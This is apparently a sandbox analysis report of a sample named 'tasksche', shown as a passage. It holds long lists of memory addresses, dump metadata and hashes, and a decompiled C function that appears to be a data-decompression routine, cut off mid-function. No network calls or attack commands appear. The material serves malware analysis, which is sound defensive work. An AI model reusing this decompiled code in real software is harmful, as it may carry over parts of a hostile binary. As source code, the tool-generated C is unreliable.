                                                                                              0x004171a8
                                                                                              0x004171a8
                                                                                              0x004171ab
                                                                                              0x004171ab
                                                                                              0x004171ad
                                                                                              0x004171b5
                                                                                              0x004171b8
                                                                                              0x004171ba
                                                                                              0x004171bd
                                                                                              0x004171c6
                                                                                              0x004171c9
                                                                                              0x004171cc
                                                                                              0x004171d5
                                                                                              0x004171d8
                                                                                              0x004171db
                                                                                              0x004171e4
                                                                                              0x004171e7
                                                                                              0x004171ea
                                                                                              0x004171f3
                                                                                              0x004171f6
                                                                                              0x004171f9
                                                                                              0x00417202
                                                                                              0x00417205
                                                                                              0x00417208
                                                                                              0x00417211
                                                                                              0x00417211
                                                                                              0x00417208
                                                                                              0x004171f9
                                                                                              0x004171ea
                                                                                              0x004171db
                                                                                              0x004171cc
                                                                                              0x004171bd
                                                                                              0x00000000
                                                                                              0x00416ca6
                                                                                              0x00416ca6
                                                                                              0x00416cac
                                                                                              0x00416cb4
                                                                                              0x00000000
                                                                                              0x00416cb6
                                                                                              0x00416cb6
                                                                                              0x00416cb6
                                                                                              0x00000000
                                                                                              0x00416cb4
                                                                                              0x0041763c
                                                                                              0x0041763c
                                                                                              0x0041763c
                                                                                              0x00417646
                                                                                              0x0041764c
                                                                                              0x00417652
                                                                                              0x0041765c
                                                                                              0x00417664
                                                                                              0x0041766a
                                                                                              0x0041766e
                                                                                              0x00417672
                                                                                              0x00417675
                                                                                              0x00417675
                                                                                              0x00417679
                                                                                              0x00416ca6
                                                                                              0x00416ca6
                                                                                              0x00416ca6
                                                                                              0x00000000
                                                                                              0x0041729c
                                                                                              0x0041729c
                                                                                              0x0041729f
                                                                                              0x0041729f
                                                                                              0x004172a7
                                                                                              0x004172ae
                                                                                              0x004172c6
                                                                                              0x004172c9
                                                                                              0x004172cc
                                                                                              0x004172d0
                                                                                              0x004172d8
                                                                                              0x004172de
                                                                                              0x004172e1
                                                                                              0x004172e3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004172e9
                                                                                              0x004172eb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004172f7
                                                                                              0x00417301
                                                                                              0x00417304
                                                                                              0x00417309
                                                                                              0x0041730b
                                                                                              0x0041730e
                                                                                              0x0041735b
                                                                                              0x0041735e
                                                                                              0x00417386
                                                                                              0x00417386
                                                                                              0x00000000
                                                                                              0x00417386
                                                                                              0x00417362
                                                                                              0x00417362
                                                                                              0x00417365
                                                                                              0x00417368
                                                                                              0x0041736e
                                                                                              0x00417373
                                                                                              0x00417377
                                                                                              0x0041737b
                                                                                              0x0041737e
                                                                                              0x00417381
                                                                                              0x00417381
                                                                                              0x00417381
                                                                                              0x00417381
                                                                                              0x00000000
                                                                                              0x00417368
                                                                                              0x00417310
                                                                                              0x00417313
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00417315
                                                                                              0x00417318
                                                                                              0x00417318
                                                                                              0x0041731b
                                                                                              0x0041731d
                                                                                              0x00417321
                                                                                              0x00417326
                                                                                              0x0041732c
                                                                                              0x00417332
                                                                                              0x00417338
                                                                                              0x0041733e
                                                                                              0x00417344
                                                                                              0x0041734a
                                                                                              0x0041734d
                                                                                              0x00417350
                                                                                              0x00417353
                                                                                              0x00417353
                                                                                              0x00417353
                                                                                              0x00417356
                                                                                              0x00000000
                                                                                              0x00417356
                                                                                              0x004172b0
                                                                                              0x004172b9
                                                                                              0x004172ba
                                                                                              0x004172bd
                                                                                              0x00000000
                                                                                              0x0041726f
                                                                                              0x00417275
                                                                                              0x0041727a
                                                                                              0x0041727a
                                                                                              0x00000000
                                                                                              0x0041738e
                                                                                              0x0041738e
                                                                                              0x0041738e
                                                                                              0x00417398
                                                                                              0x0041739e
                                                                                              0x004173a4
                                                                                              0x004173ae
                                                                                              0x004173b6
                                                                                              0x004173bc
                                                                                              0x004173c0
                                                                                              0x004173c4
                                                                                              0x004173c7
                                                                                              0x004173c7
                                                                                              0x00416cac
                                                                                              0x00416cb4
                                                                                              0x00000000
                                                                                              0x00416cb6
                                                                                              0x00416cb6
                                                                                              0x00416cb6
                                                                                              0x00416cb4
                                                                                              0x00417184
                                                                                              0x00417184
                                                                                              0x00417187
                                                                                              0x0041718a
                                                                                              0x00417190
                                                                                              0x00417195
                                                                                              0x00417199
                                                                                              0x0041719d
                                                                                              0x004171a0
                                                                                              0x004171a3
                                                                                              0x004171a3
                                                                                              0x004171a3
                                                                                              0x004171a3
                                                                                              0x00000000
                                                                                              0x0041718a
                                                                                              0x0041712d
                                                                                              0x00417130
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00417134
                                                                                              0x00417134
                                                                                              0x00417137
                                                                                              0x00417139
                                                                                              0x0041713c
                                                                                              0x0041713e
                                                                                              0x00417142
                                                                                              0x00417147
                                                                                              0x0041714d
                                                                                              0x00417153
                                                                                              0x00417159
                                                                                              0x0041715f
                                                                                              0x00417165
                                                                                              0x0041716b
                                                                                              0x0041716e
                                                                                              0x00417171
                                                                                              0x00417174
                                                                                              0x00417174
                                                                                              0x00417174
                                                                                              0x00417177
                                                                                              0x00000000
                                                                                              0x004170cd
                                                                                              0x004170cd
                                                                                              0x004170d3
                                                                                              0x004170d4
                                                                                              0x004170d5
                                                                                              0x004170d6
                                                                                              0x004170dc
                                                                                              0x00416ca6
                                                                                              0x00416cac
                                                                                              0x00416cb4
                                                                                              0x00000000
                                                                                              0x00416cb6
                                                                                              0x00416cb6
                                                                                              0x00416cb6
                                                                                              0x00000000
                                                                                              0x00416cb4
                                                                                              0x00416ca6
                                                                                              0x004170cb
                                                                                              0x00416f84
                                                                                              0x00416f87
                                                                                              0x0041705d
                                                                                              0x00417064
                                                                                              0x00417069
                                                                                              0x0041706f
                                                                                              0x00417076
                                                                                              0x00417078
                                                                                              0x00417078
                                                                                              0x0041707b
                                                                                              0x00000000
                                                                                              0x0041707b
                                                                                              0x00416f8d
                                                                                              0x00416f91
                                                                                              0x00416f98
                                                                                              0x00416fa0
                                                                                              0x00416fa6
                                                                                              0x00416faf
                                                                                              0x00416fb1
                                                                                              0x00416fb1
                                                                                              0x00416fb4
                                                                                              0x00416fb4
                                                                                              0x00416fb9
                                                                                              0x00416fbe
                                                                                              0x00416fc4
                                                                                              0x00416fc9
                                                                                              0x00416fd0
                                                                                              0x00416ffd
                                                                                              0x00416ffe
                                                                                              0x00417001
                                                                                              0x00417003
                                                                                              0x0041701d
                                                                                              0x00417020
                                                                                              0x00417027
                                                                                              0x0041702d
                                                                                              0x00417038
                                                                                              0x0041703d
                                                                                              0x00417044
                                                                                              0x0041704a
                                                                                              0x0041704c
                                                                                              0x0041704c
                                                                                              0x0041704c
                                                                                              0x0041704e
                                                                                              0x00000000
                                                                                              0x0041704e
                                                                                              0x00417005
                                                                                              0x0041700c
                                                                                              0x0041700c
                                                                                              0x0041700e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00417010
                                                                                              0x00417011
                                                                                              0x00417014
                                                                                              0x00417017
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00417019
                                                                                              0x0041701b
                                                                                              0x00000000
                                                                                              0x00416fd2
                                                                                              0x00416fd4
                                                                                              0x00416fd7
                                                                                              0x00416fe1
                                                                                              0x00416fe9
                                                                                              0x00416fee
                                                                                              0x00416ff1
                                                                                              0x00417056
                                                                                              0x00417056
                                                                                              0x00000000
                                                                                              0x00417056
                                                                                              0x00416fd0
                                                                                              0x00416f61
                                                                                              0x00000000
                                                                                              0x00416f61
                                                                                              0x00416ed5
                                                                                              0x00416e22
                                                                                              0x00416e22
                                                                                              0x00416e29
                                                                                              0x00416e50
                                                                                              0x00416e53
                                                                                              0x00416e2b
                                                                                              0x00416e31
                                                                                              0x00416e40
                                                                                              0x00416e40
                                                                                              0x00416ca6
                                                                                              0x00416cac
                                                                                              0x00416cb4
                                                                                              0x00000000
                                                                                              0x00416cb6
                                                                                              0x00416cb6
                                                                                              0x00416cb6
                                                                                              0x00000000
                                                                                              0x00416cb4
                                                                                              0x00416ca6
                                                                                              0x00416e20
                                                                                              0x00416d93
                                                                                              0x00416d3c
                                                                                              0x00416d3e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416d42
                                                                                              0x00416d47
                                                                                              0x00416d4d
                                                                                              0x00416d53
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416d59
                                                                                              0x00416d6d
                                                                                              0x00416d6d
                                                                                              0x00416d74
                                                                                              0x0041767e
                                                                                              0x00000000
                                                                                              0x0041767e
                                                                                              0x00000000
                                                                                              0x00416d74
                                                                                              0x00416d5b
                                                                                              0x00416d61
                                                                                              0x00416d67
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416d67
                                                                                              0x00416ca6
                                                                                              0x00416c5d
                                                                                              0x00416c64
                                                                                              0x00416c6b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416c71
                                                                                              0x00416c77
                                                                                              0x00416c78
                                                                                              0x00416c7b
                                                                                              0x00416c7e
                                                                                              0x00416c85
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416c96
                                                                                              0x00416c9d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID:
                                                                                              • API String ID: 2102423945-0
                                                                                              • Opcode ID: 345b0d20b664bc5a7c067b8b85495d146ce8f508c18b5b2458494fa8c5d0ce26
                                                                                              • Instruction ID: ec473c390e775c3513d1f4c5f902ffdbdf11d251c2712a84011b28fca20aaef5
                                                                                              • Opcode Fuzzy Hash: 345b0d20b664bc5a7c067b8b85495d146ce8f508c18b5b2458494fa8c5d0ce26
                                                                                              • Instruction Fuzzy Hash: 5F72E770A087459FCB29CF24C5D0AE9BBF1EF55304F1584AED99A8B342D338E985CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 99%
                                                                                              			E00415D9A(void* __ecx, signed int _a4) {
                                                                                              				void* _v8;
                                                                                              				char* _v12;
                                                                                              				signed int _v16;
                                                                                              				unsigned int _v20;
                                                                                              				signed int _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				char _v52;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t458;
                                                                                              				intOrPtr _t460;
                                                                                              				intOrPtr _t461;
                                                                                              				signed int _t462;
                                                                                              				signed int _t463;
                                                                                              				unsigned int _t464;
                                                                                              				signed int _t467;
                                                                                              				signed int _t468;
                                                                                              				signed int _t469;
                                                                                              				signed int _t471;
                                                                                              				unsigned int _t472;
                                                                                              				signed int _t475;
                                                                                              				signed int _t476;
                                                                                              				signed int _t481;
                                                                                              				intOrPtr _t498;
                                                                                              				unsigned int _t501;
                                                                                              				unsigned int _t504;
                                                                                              				intOrPtr* _t505;
                                                                                              				unsigned int _t506;
                                                                                              				signed int _t509;
                                                                                              				signed int _t510;
                                                                                              				signed int _t511;
                                                                                              				signed int _t512;
                                                                                              				signed int _t514;
                                                                                              				unsigned int _t519;
                                                                                              				unsigned int _t520;
                                                                                              				unsigned int _t522;
                                                                                              				intOrPtr* _t523;
                                                                                              				signed int _t525;
                                                                                              				char _t526;
                                                                                              				signed int _t528;
                                                                                              				signed int _t529;
                                                                                              				signed int _t536;
                                                                                              				unsigned int _t537;
                                                                                              				signed int _t540;
                                                                                              				signed int _t541;
                                                                                              				signed int _t549;
                                                                                              				signed int _t550;
                                                                                              				unsigned int _t569;
                                                                                              				unsigned int _t572;
                                                                                              				intOrPtr* _t573;
                                                                                              				unsigned int _t576;
                                                                                              				signed int _t579;
                                                                                              				signed int _t580;
                                                                                              				signed int _t581;
                                                                                              				unsigned int _t582;
                                                                                              				signed int _t585;
                                                                                              				signed int _t586;
                                                                                              				signed int _t587;
                                                                                              				unsigned int _t588;
                                                                                              				signed int _t589;
                                                                                              				signed int _t590;
                                                                                              				signed int _t591;
                                                                                              				signed int _t593;
                                                                                              				unsigned int _t594;
                                                                                              				signed int _t597;
                                                                                              				signed int _t598;
                                                                                              				signed int _t600;
                                                                                              				void* _t607;
                                                                                              				signed int _t608;
                                                                                              				intOrPtr _t613;
                                                                                              				signed int _t614;
                                                                                              				signed int _t617;
                                                                                              				void* _t619;
                                                                                              				intOrPtr* _t622;
                                                                                              				signed int _t625;
                                                                                              				void* _t627;
                                                                                              				signed char _t631;
                                                                                              				void* _t633;
                                                                                              				signed int _t634;
                                                                                              				intOrPtr _t636;
                                                                                              				char* _t639;
                                                                                              				char* _t640;
                                                                                              				void* _t642;
                                                                                              				intOrPtr* _t646;
                                                                                              				void* _t647;
                                                                                              				signed int _t650;
                                                                                              				signed int _t652;
                                                                                              				char* _t658;
                                                                                              				signed char _t663;
                                                                                              				signed int _t666;
                                                                                              				void* _t668;
                                                                                              				signed char _t672;
                                                                                              				signed int _t674;
                                                                                              				unsigned int _t679;
                                                                                              				char* _t680;
                                                                                              				void* _t682;
                                                                                              				signed int _t688;
                                                                                              				void* _t690;
                                                                                              				intOrPtr* _t692;
                                                                                              				void* _t693;
                                                                                              				signed int _t696;
                                                                                              				void* _t699;
                                                                                              				intOrPtr* _t704;
                                                                                              				void* _t705;
                                                                                              				signed int _t708;
                                                                                              				void* _t711;
                                                                                              				intOrPtr* _t716;
                                                                                              				void* _t717;
                                                                                              				signed int _t720;
                                                                                              				signed int _t726;
                                                                                              				signed int _t727;
                                                                                              				signed int _t732;
                                                                                              				signed int _t733;
                                                                                              				signed int _t738;
                                                                                              				signed int _t744;
                                                                                              				void* _t758;
                                                                                              				signed int _t759;
                                                                                              				intOrPtr _t761;
                                                                                              				char* _t762;
                                                                                              				signed int _t771;
                                                                                              				signed int _t772;
                                                                                              				unsigned int _t776;
                                                                                              				void* _t778;
                                                                                              				signed int _t779;
                                                                                              				intOrPtr _t781;
                                                                                              				char* _t782;
                                                                                              				signed int _t791;
                                                                                              				signed int _t792;
                                                                                              				void* _t806;
                                                                                              				intOrPtr* _t808;
                                                                                              				void* _t810;
                                                                                              
                                                                                              				_t608 = _a4;
                                                                                              				_t806 = __ecx;
                                                                                              				if( *((char*)(_t608 + 0x2c)) != 0) {
                                                                                              					L3:
                                                                                              					_t458 =  *((intOrPtr*)(_t608 + 0x18));
                                                                                              					_t808 = _t608 + 4;
                                                                                              					__eflags =  *_t808 -  *((intOrPtr*)(_t608 + 0x24)) + _t458;
                                                                                              					if( *_t808 <=  *((intOrPtr*)(_t608 + 0x24)) + _t458) {
                                                                                              						_t613 =  *((intOrPtr*)(_t608 + 0x20)) + _t458 - 1;
                                                                                              						_t460 =  *((intOrPtr*)(_t608 + 0x4acc)) - 0x10;
                                                                                              						__eflags = _t613 - _t460;
                                                                                              						_v32 = _t613;
                                                                                              						_v36 = _t460;
                                                                                              						_v28 = _t613;
                                                                                              						if(_t613 >= _t460) {
                                                                                              							_v28 = _t460;
                                                                                              						}
                                                                                              						while(1) {
                                                                                              							L8:
                                                                                              							_t614 =  *(_t806 + 0xe6dc);
                                                                                              							 *(_t806 + 0x70) =  *(_t806 + 0x70) & _t614;
                                                                                              							_t461 =  *_t808;
                                                                                              							__eflags = _t461 - _v28;
                                                                                              							if(_t461 < _v28) {
                                                                                              								goto L15;
                                                                                              							}
                                                                                              							L9:
                                                                                              							__eflags = _t461 - _v32;
                                                                                              							if(__eflags > 0) {
                                                                                              								L98:
                                                                                              								_t526 = 1;
                                                                                              								goto L99;
                                                                                              							}
                                                                                              							if(__eflags != 0) {
                                                                                              								L12:
                                                                                              								__eflags = _t461 - _v36;
                                                                                              								if(_t461 < _v36) {
                                                                                              									L14:
                                                                                              									__eflags = _t461 -  *((intOrPtr*)(_t608 + 0x4acc));
                                                                                              									if(_t461 >=  *((intOrPtr*)(_t608 + 0x4acc))) {
                                                                                              										L157:
                                                                                              										 *((char*)(_t608 + 0x4ad3)) = 1;
                                                                                              										goto L98;
                                                                                              									}
                                                                                              									goto L15;
                                                                                              								}
                                                                                              								__eflags =  *((char*)(_t608 + 0x4ad2));
                                                                                              								if( *((char*)(_t608 + 0x4ad2)) == 0) {
                                                                                              									goto L157;
                                                                                              								}
                                                                                              								goto L14;
                                                                                              							}
                                                                                              							__eflags =  *((intOrPtr*)(_t608 + 8)) -  *((intOrPtr*)(_t608 + 0x1c));
                                                                                              							if( *((intOrPtr*)(_t608 + 8)) >=  *((intOrPtr*)(_t608 + 0x1c))) {
                                                                                              								goto L98;
                                                                                              							}
                                                                                              							goto L12;
                                                                                              							L15:
                                                                                              							_t462 =  *(_t806 + 0x70);
                                                                                              							__eflags = ( *((intOrPtr*)(_t806 + 0x4b30)) - _t462 & _t614) - 0x1004;
                                                                                              							if(( *((intOrPtr*)(_t806 + 0x4b30)) - _t462 & _t614) >= 0x1004) {
                                                                                              								L20:
                                                                                              								_t463 = E0040978C(_t808);
                                                                                              								_t726 =  *(_t608 + 0xb4);
                                                                                              								_t464 = _t463 & 0x0000fffe;
                                                                                              								__eflags = _t464 -  *((intOrPtr*)(_t608 + 0x34 + _t726 * 4));
                                                                                              								if(_t464 >=  *((intOrPtr*)(_t608 + 0x34 + _t726 * 4))) {
                                                                                              									_t727 = _t726 + 1;
                                                                                              									_a4 = 0xf;
                                                                                              									__eflags = _t727 - 0xf;
                                                                                              									if(_t727 >= 0xf) {
                                                                                              										L28:
                                                                                              										_t617 =  *(_t808 + 4) + _a4;
                                                                                              										 *_t808 =  *_t808 + (_t617 >> 3);
                                                                                              										_t730 = _a4;
                                                                                              										 *(_t808 + 4) = _t617 & 0x00000007;
                                                                                              										_t619 = 0x10;
                                                                                              										_t467 = (_t464 -  *((intOrPtr*)(_t608 + 0x30 + _a4 * 4)) >> _t619 - _a4) +  *((intOrPtr*)(_t608 + 0x74 + _t730 * 4));
                                                                                              										__eflags = _t467 -  *((intOrPtr*)(_t608 + 0x30));
                                                                                              										if(_t467 >=  *((intOrPtr*)(_t608 + 0x30))) {
                                                                                              											_t467 = 0;
                                                                                              											__eflags = 0;
                                                                                              										}
                                                                                              										_t468 =  *(_t608 + 0xcb8 + _t467 * 2) & 0x0000ffff;
                                                                                              										L31:
                                                                                              										__eflags = _t468 - 0x100;
                                                                                              										if(_t468 >= 0x100) {
                                                                                              											__eflags = _t468 - 0x106;
                                                                                              											if(_t468 < 0x106) {
                                                                                              												__eflags = _t468 - 0x100;
                                                                                              												if(_t468 != 0x100) {
                                                                                              													__eflags = _t468 - 0x101;
                                                                                              													if(_t468 != 0x101) {
                                                                                              														_t469 = _t468 + 0xfffffefe;
                                                                                              														__eflags = _t469;
                                                                                              														_t622 = _t806 + 0x54 + _t469 * 4;
                                                                                              														_v24 =  *_t622;
                                                                                              														if(_t469 == 0) {
                                                                                              															L127:
                                                                                              															 *((intOrPtr*)(_t806 + 0x54)) = _v24;
                                                                                              															_t471 = E0040978C(_t808);
                                                                                              															_t732 =  *(_t608 + 0x2d78);
                                                                                              															_t472 = _t471 & 0x0000fffe;
                                                                                              															__eflags = _t472 -  *((intOrPtr*)(_t608 + 0x2cf8 + _t732 * 4));
                                                                                              															if(_t472 >=  *((intOrPtr*)(_t608 + 0x2cf8 + _t732 * 4))) {
                                                                                              																_t733 = _t732 + 1;
                                                                                              																_a4 = 0xf;
                                                                                              																__eflags = _t733 - 0xf;
                                                                                              																if(_t733 >= 0xf) {
                                                                                              																	L135:
                                                                                              																	_t625 =  *(_t808 + 4) + _a4;
                                                                                              																	 *_t808 =  *_t808 + (_t625 >> 3);
                                                                                              																	_t736 = _a4;
                                                                                              																	 *(_t808 + 4) = _t625 & 0x00000007;
                                                                                              																	_t627 = 0x10;
                                                                                              																	_t475 = (_t472 -  *((intOrPtr*)(_t608 + 0x2cf4 + _a4 * 4)) >> _t627 - _a4) +  *((intOrPtr*)(_t608 + 0x2d38 + _t736 * 4));
                                                                                              																	__eflags = _t475 -  *((intOrPtr*)(_t608 + 0x2cf4));
                                                                                              																	if(_t475 >=  *((intOrPtr*)(_t608 + 0x2cf4))) {
                                                                                              																		_t475 = 0;
                                                                                              																		__eflags = 0;
                                                                                              																	}
                                                                                              																	_t476 =  *(_t608 + 0x397c + _t475 * 2) & 0x0000ffff;
                                                                                              																	L138:
                                                                                              																	__eflags = _t476 - 8;
                                                                                              																	if(_t476 >= 8) {
                                                                                              																		_t631 = (_t476 >> 2) - 1;
                                                                                              																		_a4 = _t631;
                                                                                              																		_t481 = ((_t476 & 0x00000003 | 0x00000004) << _t631) + 2;
                                                                                              																		_v20 = _t481;
                                                                                              																		__eflags = _t631;
                                                                                              																		if(_t631 > 0) {
                                                                                              																			_t506 = E0040978C(_t808);
                                                                                              																			_t642 = 0x10;
                                                                                              																			_v20 = _v20 + (_t506 >> _t642 - _a4);
                                                                                              																			_t509 =  *(_t808 + 4) + _a4;
                                                                                              																			 *_t808 =  *_t808 + (_t509 >> 3);
                                                                                              																			_t510 = _t509 & 0x00000007;
                                                                                              																			__eflags = _t510;
                                                                                              																			 *(_t808 + 4) = _t510;
                                                                                              																			_t481 = _v20;
                                                                                              																		}
                                                                                              																	} else {
                                                                                              																		_t481 = _t476 + 2;
                                                                                              																		_v20 = _t481;
                                                                                              																	}
                                                                                              																	_t738 =  *(_t806 + 0x70) - _v24;
                                                                                              																	_t633 =  *((intOrPtr*)(_t806 + 0xe6d8)) + 0xffffefff;
                                                                                              																	 *(_t806 + 0x68) = _t481;
                                                                                              																	_a4 = _t481;
                                                                                              																	_v16 = _t738;
                                                                                              																	__eflags = _t738 - _t633;
                                                                                              																	if(_t738 >= _t633) {
                                                                                              																		L153:
                                                                                              																		__eflags = _t481;
                                                                                              																	} else {
                                                                                              																		__eflags =  *(_t806 + 0x70) - _t633;
                                                                                              																		if( *(_t806 + 0x70) >= _t633) {
                                                                                              																			goto L153;
                                                                                              																		}
                                                                                              																		_t636 =  *((intOrPtr*)(_t806 + 0x4b34));
                                                                                              																		_v12 = _t738 + _t636;
                                                                                              																		_t744 =  *(_t806 + 0x70);
                                                                                              																		_v8 = _t636 + _t744;
                                                                                              																		 *(_t806 + 0x70) = _t481 + _t744;
                                                                                              																		__eflags = _v24 - _t481;
                                                                                              																		if(_v24 >= _t481) {
                                                                                              																			__eflags = _t481 - 8;
                                                                                              																			if(_t481 < 8) {
                                                                                              																				L113:
                                                                                              																				__eflags = _a4;
                                                                                              																				if(_a4 <= 0) {
                                                                                              																					continue;
                                                                                              																					do {
                                                                                              																						do {
                                                                                              																							do {
                                                                                              																								do {
                                                                                              																									do {
                                                                                              																										do {
                                                                                              																											do {
                                                                                              																												do {
                                                                                              																													do {
                                                                                              																														do {
                                                                                              																															do {
                                                                                              																																do {
                                                                                              																																	do {
                                                                                              																																		do {
                                                                                              																																			while(1) {
                                                                                              																																				L8:
                                                                                              																																				_t614 =  *(_t806 + 0xe6dc);
                                                                                              																																				 *(_t806 + 0x70) =  *(_t806 + 0x70) & _t614;
                                                                                              																																				_t461 =  *_t808;
                                                                                              																																				__eflags = _t461 - _v28;
                                                                                              																																				if(_t461 < _v28) {
                                                                                              																																					goto L15;
                                                                                              																																				}
                                                                                              																																				goto L9;
                                                                                              																																			}
                                                                                              																																			L82:
                                                                                              																																			__eflags = _a4;
                                                                                              																																		} while (_a4 <= 0);
                                                                                              																																		goto L83;
                                                                                              																																	} while (_a4 <= 0);
                                                                                              																																	goto L114;
                                                                                              																																	L83:
                                                                                              																																	__eflags = _a4 - 1;
                                                                                              																																	_t639 = _v12;
                                                                                              																																	 *_t639 =  *_v8;
                                                                                              																																} while (_a4 <= 1);
                                                                                              																																goto L84;
                                                                                              																															} while (_a4 <= 1);
                                                                                              																															goto L115;
                                                                                              																															L84:
                                                                                              																															__eflags = _a4 - 2;
                                                                                              																															_t227 = _v8 + 1; // 0x300905a
                                                                                              																															 *((char*)(_t639 + 1)) =  *_t227;
                                                                                              																														} while (_a4 <= 2);
                                                                                              																														goto L85;
                                                                                              																														L115:
                                                                                              																														__eflags = _a4 - 2;
                                                                                              																														 *((char*)(_t639 + 1)) =  *((intOrPtr*)(_v12 + 1));
                                                                                              																													} while (_a4 <= 2);
                                                                                              																													goto L116;
                                                                                              																													L85:
                                                                                              																													__eflags = _a4 - 3;
                                                                                              																													_t231 = _v8 + 2; // 0x30090
                                                                                              																													 *((char*)(_t639 + 2)) =  *_t231;
                                                                                              																												} while (_a4 <= 3);
                                                                                              																												goto L86;
                                                                                              																												L116:
                                                                                              																												__eflags = _a4 - 3;
                                                                                              																												 *((char*)(_t639 + 2)) =  *((intOrPtr*)(_v12 + 2));
                                                                                              																											} while (_a4 <= 3);
                                                                                              																											goto L117;
                                                                                              																											L86:
                                                                                              																											__eflags = _a4 - 4;
                                                                                              																											_t235 = _v8 + 3; // 0x300
                                                                                              																											 *((char*)(_t639 + 3)) =  *_t235;
                                                                                              																										} while (_a4 <= 4);
                                                                                              																										goto L87;
                                                                                              																										L117:
                                                                                              																										__eflags = _a4 - 4;
                                                                                              																										 *((char*)(_t639 + 3)) =  *((intOrPtr*)(_v12 + 3));
                                                                                              																									} while (_a4 <= 4);
                                                                                              																									goto L118;
                                                                                              																									L87:
                                                                                              																									__eflags = _a4 - 5;
                                                                                              																									_t239 = _v8 + 4; // 0x3
                                                                                              																									 *((char*)(_t639 + 4)) =  *_t239;
                                                                                              																								} while (_a4 <= 5);
                                                                                              																								goto L88;
                                                                                              																								L118:
                                                                                              																								__eflags = _a4 - 5;
                                                                                              																								 *((char*)(_t639 + 4)) =  *((intOrPtr*)(_v12 + 4));
                                                                                              																							} while (_a4 <= 5);
                                                                                              																							goto L119;
                                                                                              																							L88:
                                                                                              																							__eflags = _a4 - 6;
                                                                                              																							_t243 = _v8 + 5; // 0x4000000
                                                                                              																							 *((char*)(_t639 + 5)) =  *_t243;
                                                                                              																						} while (_a4 <= 6);
                                                                                              																						_t498 = _v8;
                                                                                              																						L90:
                                                                                              																						_t246 = _t498 + 6; // 0x40000
                                                                                              																						 *((char*)(_t639 + 6)) =  *_t246;
                                                                                              																						goto L8;
                                                                                              																						do {
                                                                                              																							while(1) {
                                                                                              																								L8:
                                                                                              																								_t614 =  *(_t806 + 0xe6dc);
                                                                                              																								 *(_t806 + 0x70) =  *(_t806 + 0x70) & _t614;
                                                                                              																								_t461 =  *_t808;
                                                                                              																								__eflags = _t461 - _v28;
                                                                                              																								if(_t461 < _v28) {
                                                                                              																									goto L15;
                                                                                              																								}
                                                                                              																								goto L9;
                                                                                              																							}
                                                                                              																							L91:
                                                                                              																							__eflags = _v16;
                                                                                              																						} while (_v16 <= 0);
                                                                                              																						_t779 =  *(_t806 + 0xe6dc);
                                                                                              																						do {
                                                                                              																							_a4 = _a4 - 1;
                                                                                              																							 *( *((intOrPtr*)(_t806 + 0x4b34)) +  *(_t806 + 0x70)) =  *((intOrPtr*)((_t674 & _t779) +  *((intOrPtr*)(_t806 + 0x4b34))));
                                                                                              																							_t779 =  *(_t806 + 0xe6dc);
                                                                                              																							_t674 = _v24 + 1;
                                                                                              																							__eflags = _a4;
                                                                                              																							_v24 = _t674;
                                                                                              																							 *(_t806 + 0x70) =  *(_t806 + 0x70) + 0x00000001 & _t779;
                                                                                              																						} while (_a4 > 0);
                                                                                              																						goto L8;
                                                                                              																						do {
                                                                                              																							while(1) {
                                                                                              																								L8:
                                                                                              																								_t614 =  *(_t806 + 0xe6dc);
                                                                                              																								 *(_t806 + 0x70) =  *(_t806 + 0x70) & _t614;
                                                                                              																								_t461 =  *_t808;
                                                                                              																								__eflags = _t461 - _v28;
                                                                                              																								if(_t461 < _v28) {
                                                                                              																									goto L15;
                                                                                              																								}
                                                                                              																								goto L9;
                                                                                              																							}
                                                                                              																							goto L153;
                                                                                              																						} while (_t481 <= 0);
                                                                                              																						_t634 =  *(_t806 + 0xe6dc);
                                                                                              																						do {
                                                                                              																							_a4 = _a4 - 1;
                                                                                              																							_v16 = _v16 + 1;
                                                                                              																							 *( *((intOrPtr*)(_t806 + 0x4b34)) +  *(_t806 + 0x70)) =  *((intOrPtr*)((_v16 & _t634) +  *((intOrPtr*)(_t806 + 0x4b34))));
                                                                                              																							_t634 =  *(_t806 + 0xe6dc);
                                                                                              																							__eflags = _a4;
                                                                                              																							 *(_t806 + 0x70) =  *(_t806 + 0x70) + 0x00000001 & _t634;
                                                                                              																						} while (_a4 > 0);
                                                                                              																						goto L8;
                                                                                              																						do {
                                                                                              																							do {
                                                                                              																								do {
                                                                                              																									while(1) {
                                                                                              																										L8:
                                                                                              																										_t614 =  *(_t806 + 0xe6dc);
                                                                                              																										 *(_t806 + 0x70) =  *(_t806 + 0x70) & _t614;
                                                                                              																										_t461 =  *_t808;
                                                                                              																										__eflags = _t461 - _v28;
